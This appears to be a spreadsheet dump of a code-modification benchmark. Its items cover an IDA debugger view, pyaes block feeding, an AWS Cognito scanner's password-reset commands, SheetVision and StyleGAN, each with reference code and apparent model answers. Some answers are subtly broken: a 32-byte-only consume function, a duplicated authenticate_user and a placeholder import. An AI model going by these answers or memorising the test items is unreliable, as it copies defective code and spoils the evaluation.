idaapi.inf_is_64bit():\n                    idc.patch_qword(ea, value)\n                else:\n                    idc.patch_dword(ea, value)\n                self.reload_info()\n            except:\n                idaapi.warning("Invalid expression")\n                \n    def can_edit_line(self):\n        return True\n\n    def register_actions(self):\n        self.menu_actions.extend([\n            actions.MenuAction("-"),\n            actions.MenuAction("s_jump_disassembly", self.jump_in_disassembly, "Jump in disassembly",  None, "J",         124),\n            actions.MenuAction("s_jump_new_window",  self.jump_in_new_window,  "Jump in a new window", None, "Ctrl-J",    125),\n            actions.MenuAction("s_jump_hex",         self.jump_in_hex,         "Jump in hex",          None, "X",         89),\n            actions.MenuAction("s_jump_to",          self.jump_to,             "Sync with expr",       shortcut="G", icon=124),\n            actions.MenuAction("s_modify_value",     self.modify_value,        "Modify value",         None, "E",         104),\n            actions.MenuAction("s_stack_entries",    self.set_stack_entries,   "Stack entries"),\n            actions.MenuAction("-"),\n        ])\n        actions.register_menu_actions(self)\n\n    def unregister_actions(self):\n        actions.unregister_menu_actions(self)\n\n    def Create(self, title):\n        if not idaapi.simplecustviewer_t.Create(self, title):\n            return False\n\n        self.register_actions()\n        self.hook = dbg.DbgHooks(self.reload_info)\n        self.hook.hook()\n\n        if not self.reload_info():\n            return False\n        return True\n\n    def OnKeydown(self, vkey, shift):\n        if vkey == ord(\'U\'):\n            self.reload_info()\n        elif vkey == 27:\n            pass\n        else:\n            return False\n        return True\n\n    def add_line(self, s=None):\n        if not s:\n            s = ""\n        self.AddLine(s)\n\n    def OnCursorPosChanged(self):\n        pass\n\n    def parse_value(self, value):\n        reduced = False\n        chain = self.get_ptr_chain(value)\n\n        result = ""\n        result += self.colorize_value(chain[0])\n\n        vals = chain[1:]\n        if len(vals) &gt; config.max_deref_levels:\n            vals = vals[:config.max_deref_levels]\n            reduced = True\n\n        result += \'\'.join([self.as_ptr(value) for value in vals])\n        if reduced:\n            result += self.as_arrow_string("[...]")\n\n        result += self.get_value_info(chain[-1], stack_view=True)\n        if chain.limit_exceeded:\n            result += self.as_arrow_string("[...]")\n\n        return result\n\n    #Modify\n    def reload_info(self):\n        if not dbg.is_process_suspended():\n            return False\n\n        base_addr = None\n        if self.base_expr is None:\n            base_addr = idc.get_reg_value(dbg.registers.stack)\n        else:\n            base_addr = idaapi.str2ea(self.base_expr)\n            if base_addr == idc.BADADDR:\n                idaapi.warning("Invalid base expr: %s" % self.base_expr)\n                return False\n\n            if not idaapi.is_loaded(base_addr):\n                idaapi.warning("Memory address is not loaded: $#x" % base_addr)\n                return False\n\n        self.ClearLines()\n        dbg.set_thread_info()\n\n        try:\n            segm_end = idc.get_segm_end(base_addr)\n            n_entries = config.n_stack_entries or ((segm_end-base_addr) // dbg.ptr_size)\n\n            for i in range(n_entries):\n                offset = i * dbg.ptr_size\n                ptr = base_addr + offset\n\n                if not idaapi.is_loaded(ptr):\n                    break\n\n                value = dbg.get_ptr(ptr)\n                self.add_line("%02d:%04X  %s" % (i, offset, self.parse_value(ptr)))\n\n        except Exception as e:\n            idaapi.warning(str(e))\n            return False\n        #New\n        if config.on_stack_reload_callback and callable(config.on_stack_reload_callback):\n            config.on_stack_reload_callback()\n        return True\n\n    def OnDblClick(self, shift):\n        symbol = self.get_current_word()\n        if symbol is not None:\n            ea = self.resolve_expr(symbol)\n            if ea and idaapi.is_loaded(ea):\n                idaapi.jumpto(ea)\n                return True\n        return False\n\n    def set_window_position(self):\n        stack_view = idaapi.find_widget("Stack view")\n        if stack_view:\n            idaapi.set_dock_pos(STACK_WIDGET_TITLE, "Stack view", idaapi.DP_INSIDE)\n        else:\n            idaapi.set_dock_pos(STACK_WIDGET_TITLE, REGS_WIDGET_TITLE, idaapi.DP_BOTTOM)\n\n    def OnClose(self):\n        self.unregister_actions()\n        if self.hook:\n            self.hook.unhook()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def reload_info(self):\n    if not dbg.is_process_suspended():\n        return False\n\n    base_addr = None\n    if self.base_expr is None:\n        base_addr = idc.get_reg_value(dbg.registers.stack)\n    else:\n        base_addr = idaapi.str2ea(self.base_expr)\n        if base_addr == idc.BADADDR:\n            idaapi.warning("Invalid base expr: %s" % self.base_expr)\n            return False\n\n        if not idaapi.is_loaded(base_addr):\n            idaapi.warning("Memory address is not loaded: $#x" % base_addr)\n            return False\n\n    self.ClearLines()\n    dbg.set_thread_info()\n\n    try:\n        segm_end = idc.get_segm_end(base_addr)\n        n_entries = config.n_stack_entries or ((segm_end-base_addr) // dbg.ptr_size)\n\n        for i in range(n_entries):\n            offset = i * dbg.ptr_size\n            ptr = base_addr + offset\n\n            if not idaapi.is_loaded(ptr):\n                break\n\n            value = dbg.get_ptr(ptr)\n            self.add_line("%02d:%04X  %s" % (i, offset, self.parse_value(ptr)))\n\n        #New\n        self.new_feature_function()\n\n    except Exception as e:\n        idaapi.warning(str(e))\n        return False\n    return True', '#file 2': 'def Create(self, title):\n    if not idaapi.simplecustviewer_t.Create(self, title):\n        return False\n\n    self.register_actions()\n    self.hook = dbg.DbgHooks(self.reload_info)\n    self.hook.hook()\n\n    if not self.reload_info():\n        return False\n    return True', '#file 3': "def OnKeydown(self, vkey, shift):\n    if vkey == ord('U'):\n        self.reload_info()\n    elif vkey == 27: # ESC\n        pass\n    else:\n        return False\n    return True", '#file 4': 'def new_feature_function(self):\n    # New feature implementation\n    print("New feature invoked")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def _block_can_consume(self, size):\n    if size &gt;= 16: return 16\n    return 0', 'invoking_code_segment': 'while len(self._buffer) &gt; 16:\n            can_consume = self._mode._can_consume(len(self._buffer) - 16)\n            if can_consume == 0: break\n            result += self._feed(self._buffer[:can_consume])\n            self._buffer = self._buffer[can_consume:]', 'feature_description': 'Extend the block consumption size from 16 bytes to 32 bytes to allow processing larger chunks of data in a single operation, improving throughput for block cipher modes of operation.', 'modified_complete_code': '# pyaes/pyaes/util.py - No changes required\n\n# pyaes/pyaes/blockfeeder.py\nfrom .aes import AESBlockModeOfOperation, AESSegmentModeOfOperation, AESStreamModeOfOperation\nfrom .util import append_PKCS7_padding, strip_PKCS7_padding, to_bufferable\n\nPADDING_NONE       = \'none\'\nPADDING_DEFAULT    = \'default\'\n\n#Modify\ndef _block_can_consume(self, size):\n    if size &gt;= 32: return 32\n    if size &gt;= 16: return 16\n    return 0\n\n#Modify\ndef _block_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding == PADDING_DEFAULT:\n        data = append_PKCS7_padding(data)\n    elif padding == PADDING_NONE:\n        if len(data) != 16:\n            raise Exception(\'invalid data length for final block\')\n    else:\n        raise Exception(\'invalid padding option\')\n    \n    #Modify\n    if len(data) == 64:\n        return self.encrypt(data[:16]) + self.encrypt(data[16:32]) + self.encrypt(data[32:48]) + self.encrypt(data[48:])\n    elif len(data) == 48:\n        return self.encrypt(data[:16]) + self.encrypt(data[16:32]) + self.encrypt(data[32:])\n    elif len(data) == 32:\n        return self.encrypt(data[:16]) + self.encrypt(data[16:])\n    return self.encrypt(data)\n\ndef _block_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding == PADDING_DEFAULT:\n        return strip_PKCS7_padding(self.decrypt(data))\n    if padding == PADDING_NONE:\n        if len(data) != 16:\n            raise Exception(\'invalid data length for final block\')\n        return self.decrypt(data)\n    raise Exception(\'invalid padding option\')\n\nAESBlockModeOfOperation._can_consume = _block_can_consume\nAESBlockModeOfOperation._final_encrypt = _block_final_encrypt\nAESBlockModeOfOperation._final_decrypt = _block_final_decrypt\n\ndef _segment_can_consume(self, size):\n    return self.segment_bytes * int(size // self.segment_bytes)\n\ndef _segment_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding != PADDING_DEFAULT:\n        raise Exception(\'invalid padding option\')\n    faux_padding = (chr(0) * (self.segment_bytes - (len(data) % self.segment_bytes)))\n    padded = data + to_bufferable(faux_padding)\n    return self.encrypt(padded)[:len(data)]\n\ndef _segment_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding != PADDING_DEFAULT:\n        raise Exception(\'invalid padding option\')\n    faux_padding = (chr(0) * (self.segment_bytes - (len(data) % self.segment_bytes)))\n    padded = data + to_bufferable(faux_padding)\n    return self.decrypt(padded)[:len(data)]\n\nAESSegmentModeOfOperation._can_consume = _segment_can_consume\nAESSegmentModeOfOperation._final_encrypt = _segment_final_encrypt\nAESSegmentModeOfOperation._final_decrypt = _segment_final_decrypt\n\ndef _stream_can_consume(self, size):\n    return size\n\ndef _stream_final_encrypt(self, data, padding = PADDING_DEFAULT):\n    if padding not in [PADDING_NONE, PADDING_DEFAULT]:\n        raise Exception(\'invalid padding option\')\n    return self.encrypt(data)\n\ndef _stream_final_decrypt(self, data, padding = PADDING_DEFAULT):\n    if padding not in [PADDING_NONE, PADDING_DEFAULT]:\n        raise Exception(\'invalid padding option\')\n    return self.decrypt(data)\n\nAESStreamModeOfOperation._can_consume = _stream_can_consume\nAESStreamModeOfOperation._final_encrypt = _stream_final_encrypt\nAESStreamModeOfOperation._final_decrypt = _stream_final_decrypt\n\nclass BlockFeeder(object):\n    def __init__(self, mode, feed, final, padding = PADDING_DEFAULT):\n        self._mode = mode\n        self._feed = feed\n        self._final = final\n        self._buffer = to_bufferable("")\n        self._padding = padding\n\n    def feed(self, data = None):\n        if self._buffer is None:\n            raise ValueError(\'already finished feeder\')\n        if data is None:\n            result = self._final(self._buffer, self._padding)\n            self._buffer = None\n            return result\n        self._buffer += to_bufferable(data)\n        #Modify\n        result = to_bufferable(\'\')\n        while len(self._buffer) &gt; 32:\n            can_consume = self._mode._can_consume(len(self._buffer) - 32)\n            if can_consume == 0: break\n            result += self._feed(self._buffer[:can_consume])\n            self._buffer = self._buffer[can_consume:]\n        return result\n\nclass Encrypter(BlockFeeder):\n    def __init__(self, mode, padding = PADDING_DEFAULT):\n        BlockFeeder.__init__(self, mode, mode.encrypt, mode._final_encrypt, padding)\n\nclass Decrypter(BlockFeeder):\n    def __init__(self, mode, padding = PADDING_DEFAULT):\n        BlockFeeder.__init__(self, mode, mode.decrypt, mode._final_decrypt, padding)\n\nBLOCK_SIZE = (1 &lt;&lt; 13)\n\ndef _feed_stream(feeder, in_stream, out_stream, block_size = BLOCK_SIZE):\n    while True:\n        chunk = in_stream.read(block_size)\n        if not chunk:\n            break\n        converted = feeder.feed(chunk)\n        out_stream.write(converted)\n    converted = feeder.feed()\n    out_stream.write(converted)\n\ndef encrypt_stream(mode, in_stream, out_stream, block_size = BLOCK_SIZE, padding = PADDING_DEFAULT):\n    encrypter = Encrypter(mode, padding = padding)\n    _feed_stream(encrypter, in_stream, out_stream, block_size)\n\ndef decrypt_stream(mode, in_stream, out_stream, block_size = BLOCK_SIZE, padding = PADDING_DEFAULT):\n    decrypter = Decrypter(mode, padding = padding)\n    _feed_stream(decrypter, in_stream, out_stream, block_size)'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\ndef _block_can_consume_extended(self, size):\n    if size &gt;= 32: return 32\n    return 0', '#file 2': '#Modify\nAESBlockModeOfOperation._can_consume = _block_can_consume_extended', '#file 3': "#Modify\ndef feed(self, data = None):\n    if self._buffer is None:\n        raise ValueError('already finished feeder')\n\n    # Finalize; process the spare bytes we were keeping\n    if data is None:\n        result = self._final(self._buffer, self._padding)\n        self._buffer = None\n        return result\n\n    self._buffer += to_bufferable(data)\n\n    # We keep 32 bytes around so we can determine padding\n    result = to_bufferable('')\n    while len(self._buffer) &gt; 32:\n        can_consume = self._mode._can_consume(len(self._buffer) - 32)\n        if can_consume == 0: break\n        result += self._feed(self._buffer[:can_consume])\n        self._buffer = self._buffer[can_consume:]\n\n    return result", '#file 4': '#New\ndef _block_can_consume_extended(self, size):\n    if size &gt;= 32: return 32\n    return 0\n\nAESBlockModeOfOperation._can_consume = _block_can_consume_extended'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'AWSSRP class methods: authenticate_user(), set_new_password_challenge(), and new method forgot_password()', 'invoking_code_segment': 'scanner.py CLI commands that instantiate AWSSRP and call its methods', 'feature_description': 'Add a feature to generate a password reset link for a user by implementing a forgot_password() method in the AWSSRP class that initiates the Cognito forgot password flow and returns a confirmation code, along with a new CLI command to trigger this functionality.', 'modified_complete_code': '# File 1: cognito-scanner/scanner/AWSSRP.py - Add new method to AWSSRP class\n\n    # #New - Generate password reset link for user\n    def forgot_password(self, client=None):\n        """\n        Initiate forgot password flow for user\n        :param {boto3.client} client Optional boto3 client.\n        :return {dict} Response containing CodeDeliveryDetails.\n        """\n        boto_client = self.client or client\n        \n        forgot_password_params = {\'Username\': self.username, \'ClientId\': self.client_id}\n        \n        if self.client_secret is not None:\n            forgot_password_params[\'SecretHash\'] = self.get_secret_hash(\n                self.username, self.client_id, self.client_secret\n            )\n        \n        response = boto_client.forgot_password(**forgot_password_params)\n        return response\n\n    # #New - Reset password with confirmation code\n    def confirm_forgot_password(self, confirmation_code, new_password, client=None):\n        """\n        Confirm forgot password with confirmation code and set new password\n        :param {String} confirmation_code Confirmation code from email/SMS.\n        :param {String} new_password New password to set.\n        :param {boto3.client} client Optional boto3 client.\n        :return {dict} Response from confirm_forgot_password API.\n        """\n        boto_client = self.client or client\n        \n        confirm_params = {\n            \'ClientId\': self.client_id,\n            \'Username\': self.username,\n            \'ConfirmationCode\': confirmation_code,\n            \'Password\': new_password\n        }\n        \n        if self.client_secret is not None:\n            confirm_params[\'SecretHash\'] = self.get_secret_hash(\n                self.username, self.client_id, self.client_secret\n            )\n        \n        response = boto_client.confirm_forgot_password(**confirm_params)\n        return response\n\n# File 2: cognito-scanner/scanner/scanner.py - Add new CLI command\n\n    # #New - Initiate password reset for user\n    @cli.command(help="Initiate password reset for user")\n    def forgot_password(\n        client_id: Annotated[str, client_id_option] = \'\',\n        region: Annotated[str, region_option] = \'eu-west-3\',\n        username: Annotated[str, typer.Option(\'--username\', help=\'Username\')] = \'\',\n        secret_hash: Annotated[str, secret_hash_option] = None,\n    ):\n        # Check that username is passed correctly\n        if not username or username == \'\':\n            raise ValueError(\'You need to pass the username. Type --help for more information\')\n        \n        # Create SRP object\n        srp = AWSSRP(\n            username=username,\n            password=None,\n            pool_id=None,\n            client_id=client_id,\n            pool_region=region,\n            client_secret=secret_hash\n        )\n        \n        # Initiate forgot password flow\n        response = srp.forgot_password()\n        \n        print(\'Password reset initiated!\')\n        print(\'{\')\n        print(f"\\tCodeDeliveryDetails: {response.get(\'CodeDeliveryDetails\')}")\n        print(\'}\')\n        print("/!\\ Check your email/SMS for the confirmation code and use the reset-password subcommand to complete the reset")\n\n    # #New - Complete password reset with confirmation code\n    @cli.command(help="Complete password reset with confirmation code")\n    def reset_password(\n        client_id: Annotated[str, client_id_option] = \'\',\n        region: Annotated[str, region_option] = \'eu-west-3\',\n        username: Annotated[str, typer.Option(\'--username\', help=\'Username\')] = \'\',\n        confirmation_code: Annotated[str, typer.Option(\'--code\', help=\'Confirmation code from email/SMS\')] = \'\',\n        new_password: Annotated[str, typer.Option(\'--new_password\', help=\'New password\')] = \'\',\n        secret_hash: Annotated[str, secret_hash_option] = None,\n    ):\n        # Check that required parameters are passed\n        if not confirmation_code or confirmation_code == \'\':\n            raise ValueError(\'You need to pass the confirmation code. Type --help for more information\')\n        if not new_password or new_password == \'\':\n            raise ValueError(\'You need to pass the new password. Type --help for more information\')\n        \n        # Create SRP object\n        srp = AWSSRP(\n            username=username,\n            password=new_password,\n            pool_id=None,\n            client_id=client_id,\n            pool_region=region,\n            client_secret=secret_hash\n        )\n        \n        # Complete password reset\n        response = srp.confirm_forgot_password(confirmation_code, new_password)\n        \n        print(\'Password reset successful!\')\n        print(\'{\')\n        print(f"\\tResponseMetadata: {response.get(\'ResponseMetadata\')}")\n        print(\'}\')\n        print("/!\\ You can now authenticate with your new password")\n'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_password_authentication_key(self, username, password, server_b_value, salt):\n    """\n    Calculates the final hkdf based on computed S value, and computed U value and the key\n    :param {String} username Username.\n    :param {String} password Password.\n    :param {Long integer} server_b_value Server B value.\n    :param {Long integer} salt Generated salt.\n    :return {Buffer} Computed HKDF value.\n    """\n    u_value = calculate_u(self.large_a_value, server_b_value)\n    if u_value == 0:\n        raise ValueError(\'U cannot be zero.\')\n    username_password = \'%s%s:%s\' % (self.pool_id.split(\'_\')[1], username, password)\n    username_password_hash = hash_sha256(username_password.encode(\'utf-8\'))\n\n    x_value = hex_to_long(hex_hash(pad_hex(salt) + username_password_hash))\n    g_mod_pow_xn = pow(self.g, x_value, self.big_n)\n    int_value2 = server_b_value - self.k * g_mod_pow_xn\n    s_value = pow(int_value2, self.small_a_value + u_value * x_value, self.big_n)\n    hkdf = compute_hkdf(bytearray.fromhex(pad_hex(s_value)),\n                        bytearray.fromhex(pad_hex(long_to_hex(u_value))))\n    return hkdf\n\n#Modify\ndef authenticate_user(self, client=None):\n    boto_client = self.client or client\n    auth_params = self.get_auth_params()\n    response = boto_client.initiate_auth(\n        AuthFlow=\'USER_SRP_AUTH\',\n        AuthParameters=auth_params,\n        ClientId=self.client_id\n    )\n    if response[\'ChallengeName\'] == self.PASSWORD_VERIFIER_CHALLENGE:\n        challenge_response = self.process_challenge(response[\'ChallengeParameters\'])\n        tokens = boto_client.respond_to_auth_challenge(\n            ClientId=self.client_id,\n            ChallengeName=self.PASSWORD_VERIFIER_CHALLENGE,\n            ChallengeResponses=challenge_response)\n\n        if tokens.get(\'ChallengeName\') == self.NEW_PASSWORD_REQUIRED_CHALLENGE:\n          print(\'Change password before authenticating\')\n          exit(1)\n\n        return tokens\n    else:\n        raise NotImplementedError(\'The %s challenge is not supported\' % response[\'ChallengeName\'])\n\n#New\nfrom new_file import generate_password_reset_link\n\n#Modify\ndef authenticate_user(self, client=None):\n    boto_client = self.client or client\n    auth_params = self.get_auth_params()\n    response = boto_client.initiate_auth(\n        AuthFlow=\'USER_SRP_AUTH\',\n        AuthParameters=auth_params,\n        ClientId=self.client_id\n    )\n    if response[\'ChallengeName\'] == self.PASSWORD_VERIFIER_CHALLENGE:\n        challenge_response = self.process_challenge(response[\'ChallengeParameters\'])\n        tokens = boto_client.respond_to_auth_challenge(\n            ClientId=self.client_id,\n            ChallengeName=self.PASSWORD_VERIFIER_CHALLENGE,\n            ChallengeResponses=challenge_response)\n\n        if tokens.get(\'ChallengeName\') == self.NEW_PASSWORD_REQUIRED_CHALLENGE:\n          print(\'Change password before authenticating\')\n          exit(1)\n\n        return tokens\n    else:\n        print(\'Generating password reset link...\')\n        reset_link = generate_password_reset_link(self.username, self.client_id, self.client_secret, self.pool_region)\n        print(f\'Password reset link: {reset_link}\')\n        raise NotImplementedError(\'The %s challenge is not supported\' % response[\'ChallengeName\'])', '#file 2': 'def process_challenge(self, challenge_parameters):\n    user_id_for_srp = challenge_parameters[\'USER_ID_FOR_SRP\']\n    salt_hex = challenge_parameters[\'SALT\']\n    srp_b_hex = challenge_parameters[\'SRP_B\']\n    secret_block_b64 = challenge_parameters[\'SECRET_BLOCK\']\n    # re strips leading zero from a day number (required by AWS Cognito)\n    timestamp = re.sub(r" 0(\\d) ", r" \\1 ",\n                       datetime.datetime.utcnow().strftime("%a %b %d %H:%M:%S UTC %Y"))\n    hkdf = self.get_password_authentication_key(user_id_for_srp,\n                                                self.password, hex_to_long(srp_b_hex), salt_hex)\n    secret_block_bytes = base64.standard_b64decode(secret_block_b64)\n    msg = bytearray(self.pool_id.split(\'_\')[1], \'utf-8\') + bytearray(user_id_for_srp, \'utf-8\') +\n        bytearray(secret_block_bytes) + bytearray(timestamp, \'utf-8\')\n    hmac_obj = hmac.new(hkdf, msg, digestmod=hashlib.sha256)\n    signature_string = base64.standard_b64encode(hmac_obj.digest())\n    response = {\'TIMESTAMP\': timestamp,\n                \'USERNAME\': user_id_for_srp,\n                \'PASSWORD_CLAIM_SECRET_BLOCK\': secret_block_b64,\n                \'PASSWORD_CLAIM_SIGNATURE\': signature_string.decode(\'utf-8\')}\n    if self.client_secret is not None:\n        response.update({\n            "SECRET_HASH":\n            self.get_secret_hash(self.username, self.client_id, self.client_secret)})\n    return response', '#file 3': "def authenticate_user(self, client=None):\n    boto_client = self.client or client\n    auth_params = self.get_auth_params()\n    response = boto_client.initiate_auth(\n        AuthFlow='USER_SRP_AUTH',\n        AuthParameters=auth_params,\n        ClientId=self.client_id\n    )\n    if response['ChallengeName'] == self.PASSWORD_VERIFIER_CHALLENGE:\n        challenge_response = self.process_challenge(response['ChallengeParameters'])\n        tokens = boto_client.respond_to_auth_challenge(\n            ClientId=self.client_id,\n            ChallengeName=self.PASSWORD_VERIFIER_CHALLENGE,\n            ChallengeResponses=challenge_response)\n\n        if tokens.get('ChallengeName') == self.NEW_PASSWORD_REQUIRED_CHALLENGE:\n          print('Change password before authenticating')\n          exit(1)\n\n        return tokens\n    else:\n        raise NotImplementedError('The %s challenge is not supported' % response['ChallengeName'])", '#file 4': "def generate_password_reset_link(username, client_id, client_secret, region):\n    client = boto3.client('cognito-idp', region_name=region)\n    secret_hash = AWSSRP.get_secret_hash(username, client_id, client_secret)\n    response = client.forgot_password(\n        ClientId=client_id,\n        SecretHash=secret_hash,\n        Username=username\n    )\n    return response['CodeDeliveryDetails']['Destination']"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def merge_recs(recs, threshold):\n    filtered_recs = []\n    while len(recs) &gt; 0:\n        r = recs.pop(0)\n        recs.sort(key=lambda rec: rec.distance(r))\n        merged = True\n        while(merged):\n            merged = False\n            i = 0\n            for _ in range(len(recs)):\n                if r.overlap(recs[i]) &gt; threshold or recs[i].overlap(r) &gt; threshold:\n                    r = r.merge(recs.pop(i))\n                    merged = True\n                elif recs[i].distance(r) &gt; r.w/2 + recs[i].w/2:\n                    break\n                else:\n                    i += 1\n        filtered_recs.append(r)\n    return filtered_recs', 'invoking_code_segment': 'staff_recs = merge_recs(staff_recs, 0.01)\nstaff_boxes = merge_recs([Rectangle(0, r.y, img_width, r.h) for r in staff_recs], 0.01)\nsharp_recs = merge_recs([j for i in sharp_recs for j in i], 0.5)\nflat_recs = merge_recs([j for i in flat_recs for j in i], 0.5)\nquarter_recs = merge_recs([j for i in quarter_recs for j in i], 0.5)\nhalf_recs = merge_recs([j for i in half_recs for j in i], 0.5)\nwhole_recs = merge_recs([j for i in whole_recs for j in i], 0.5)', 'feature_description': 'Add a feature to filter rectangles based on their size before merging. This allows users to exclude rectangles that are too small or too large from the merging process, improving the quality of detected regions by removing noise and outliers.', 'modified_complete_code': '#file 1: SheetVision/rectangle.py\nimport cv2\nimport math\n\nclass Rectangle(object):\n    def __init__(self, x, y, w, h):\n        self.x = x;\n        self.y = y;\n        self.w = w;\n        self.h = h;\n        self.middle = self.x + self.w/2, self.y + self.h/2\n        self.area = self.w * self.h\n\n    def overlap(self, other):\n        overlap_x = max(0, min(self.x + self.w, other.x + other.w) - max(self.x, other.x));\n        overlap_y = max(0, min(self.y + self.h, other.y + other.h) - max(self.y, other.y));\n        overlap_area = overlap_x * overlap_y\n        return overlap_area / self.area\n\n    def distance(self, other):\n        dx = self.middle[0] - other.middle[0]\n        dy = self.middle[1] - other.middle[1]\n        return math.sqrt(dx*dx + dy*dy)\n\n    def merge(self, other):\n        x = min(self.x, other.x)\n        y = min(self.y, other.y)\n        w = max(self.x + self.w, other.x + other.w) - x\n        h = max(self.y + self.h, other.y + other.h) - y\n        return Rectangle(x, y, w, h)\n\n    def draw(self, img, color, thickness):\n        pos = ((int)(self.x), (int)(self.y))\n        size = ((int)(self.x + self.w), (int)(self.y + self.h))\n        cv2.rectangle(img, pos, size, color, thickness)\n\n    #New\n    def is_within_size_range(self, min_area=None, max_area=None, min_width=None, max_width=None, min_height=None, max_height=None):\n        """Check if rectangle is within specified size constraints."""\n        if min_area is not None and self.area &lt; min_area:\n            return False\n        if max_area is not None and self.area &gt; max_area:\n            return False\n        if min_width is not None and self.w &lt; min_width:\n            return False\n        if max_width is not None and self.w &gt; max_width:\n            return False\n        if min_height is not None and self.h &lt; min_height:\n            return False\n        if max_height is not None and self.h &gt; max_height:\n            return False\n        return True\n\n#file 2: SheetVision/main.py\n#Modify\ndef merge_recs(recs, threshold, min_area=None, max_area=None, min_width=None, max_width=None, min_height=None, max_height=None):\n    #New - Filter rectangles by size before merging\n    filtered_input_recs = [r for r in recs if r.is_within_size_range(min_area, max_area, min_width, max_width, min_height, max_height)]\n    filtered_recs = []\n    while len(filtered_input_recs) &gt; 0:\n        r = filtered_input_recs.pop(0)\n        filtered_input_recs.sort(key=lambda rec: rec.distance(r))\n        merged = True\n        while(merged):\n            merged = False\n            i = 0\n            for _ in range(len(filtered_input_recs)):\n                if r.overlap(filtered_input_recs[i]) &gt; threshold or filtered_input_recs[i].overlap(r) &gt; threshold:\n                    r = r.merge(filtered_input_recs.pop(i))\n                    merged = True\n                elif filtered_input_recs[i].distance(r) &gt; r.w/2 + filtered_input_recs[i].w/2:\n                    break\n                else:\n                    i += 1\n        filtered_recs.append(r)\n    return filtered_recs\n\n#Modify - Updated calls to merge_recs with size filtering parameters\nprint("Merging staff image results...")\nstaff_recs = merge_recs(staff_recs, 0.01, min_area=100)\nstaff_boxes = merge_recs([Rectangle(0, r.y, img_width, r.h) for r in staff_recs], 0.01)\n\nprint("Merging sharp image results...")\nsharp_recs = merge_recs([j for i in sharp_recs for j in i], 0.5, min_area=50)\n\nprint("Merging flat image results...")\nflat_recs = merge_recs([j for i in flat_recs for j in i], 0.5, min_area=50)\n\nprint("Merging quarter image results...")\nquarter_recs = merge_recs([j for i in quarter_recs for j in i], 0.5, min_area=100)\n\nprint("Merging half image results...")\nhalf_recs = merge_recs([j for i in half_recs for j in i], 0.5, min_area=100)\n\nprint("Merging whole image results...")\nwhole_recs = merge_recs([j for i in whole_recs for j in i], 0.5, min_area=100)'}</t>
  </si>
  <si>
    <t>{'#file 1': "#Modify\ndef merge_recs(recs, threshold, min_size=0, max_size=float('inf')):\n    recs = filter_recs_by_size(recs, min_size, max_size)\n    filtered_recs = []\n    while len(recs) &gt; 0:\n        r = recs.pop(0)\n        recs.sort(key=lambda rec: rec.distance(r))\n        merged = True\n        while(merged):\n            merged = False\n            i = 0\n            for _ in range(len(recs)):\n                if r.overlap(recs[i]) &gt; threshold or recs[i].overlap(r) &gt; threshold:\n                    r = r.merge(recs.pop(i))\n                    merged = True\n                elif recs[i].distance(r) &gt; r.w/2 + recs[i].w/2:\n                    break\n                else:\n                    i += 1\n        filtered_recs.append(r)\n    return filtered_recs", '#file 2': '#Modify\nprint("Merging staff image results...")\nstaff_recs = merge_recs([j for i in staff_recs for j in i], 0.01, min_size=10, max_size=100)\nstaff_recs_img = img.copy()\nfor r in staff_recs:\n    r.draw(staff_recs_img, (0, 0, 255), 2)\ncv2.imwrite(\'staff_recs_img.png\', staff_recs_img)\nopen_file(\'staff_recs_img.png\')', '#file 3': '#Modify\nprint("Discovering staff locations...")\nstaff_boxes = merge_recs([Rectangle(0, r.y, img_width, r.h) for r in staff_recs], 0.01, min_size=10, max_size=100)\nstaff_boxes_img = img.copy()\nfor r in staff_boxes:\n    r.draw(staff_boxes_img, (0, 0, 255), 2)\ncv2.imwrite(\'staff_boxes_img.png\', staff_boxes_img)\nopen_file(\'staff_boxes_img.png\')', '#file 4': '#New\ndef filter_recs_by_size(recs, min_size, max_size):\n    return [r for r in recs if r.w &gt; min_size and r.h &gt; min_size and r.w &lt; max_size and r.h &lt; max_size]'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'load_seq_stylegan(category, truncation=1.0, **kwargs) function in rewriting/utils/stylegan2/__init__.py and SeqStyleGAN2 class in rewriting/utils/stylegan2/models.py', 'invoking_code_segment': 'main() function in rewriting/metrics/make_watermark_images.py that calls load_seq_stylegan() and uses the returned model', 'feature_description': 'Add image processing and insight generation feature that analyzes generated images to extract statistical insights (mean activation, feature diversity, layer-wise statistics) and stores them alongside generated images for further analysis', 'modified_complete_code': '# rewriting/utils/stylegan2/models.py - Add new class at end\n\nclass ImageInsightExtractor(nn.Module):\n    \'\'\'#New\n    Extracts and computes insights from generated images and intermediate feature maps.\n    Provides statistical analysis of activations across layers.\n    \'\'\'\n    def __init__(self):\n        super().__init__()\n        self.layer_stats = {}\n    \n    def forward(self, d):\n        \'\'\'#New\n        Extract insights from DataBag containing fmap and output.\n        Returns DataBag with added insights field.\n        \'\'\'\n        insights = {}\n        if \'fmap\' in d:\n            fmap = d.fmap\n            insights[\'fmap_mean\'] = fmap.mean().item()\n            insights[\'fmap_std\'] = fmap.std().item()\n            insights[\'fmap_max\'] = fmap.max().item()\n            insights[\'fmap_min\'] = fmap.min().item()\n            insights[\'fmap_shape\'] = list(fmap.shape)\n        if \'output\' in d:\n            output = d.output\n            insights[\'output_mean\'] = output.mean().item()\n            insights[\'output_std\'] = output.std().item()\n            insights[\'output_range\'] = (output.min().item(), output.max().item())\n        return DataBag(d, insights=insights)\n\n# rewriting/utils/stylegan2/__init__.py - Modify load_seq_stylegan function\n\ndef load_seq_stylegan(category, truncation=1.0, extract_insights=False, **kwargs):\n    \'\'\'#Modify\n    loads nn sequential version of stylegan2 and puts on gpu.\n    #New: Added extract_insights parameter to enable image insight extraction.\n    \'\'\'\n    state_dict = load_state_dict(category)\n    size = sizes[category]\n    g = SeqStyleGAN2(size, style_dim=512, n_mlp=8, truncation=truncation, **kwargs)\n    g.load_state_dict(state_dict[\'g_ema\'],\n            latent_avg=state_dict[\'latent_avg\'])\n    g.cuda()\n    #New: Add insight extractor if requested\n    if extract_insights:\n        from .models import ImageInsightExtractor\n        g.insight_extractor = ImageInsightExtractor()\n    return g\n\n# rewriting/metrics/make_watermark_images.py - Modify main() and add new function\n\ndef main():\n    parser = argparse.ArgumentParser(description=\'make_watermark_images\')\n    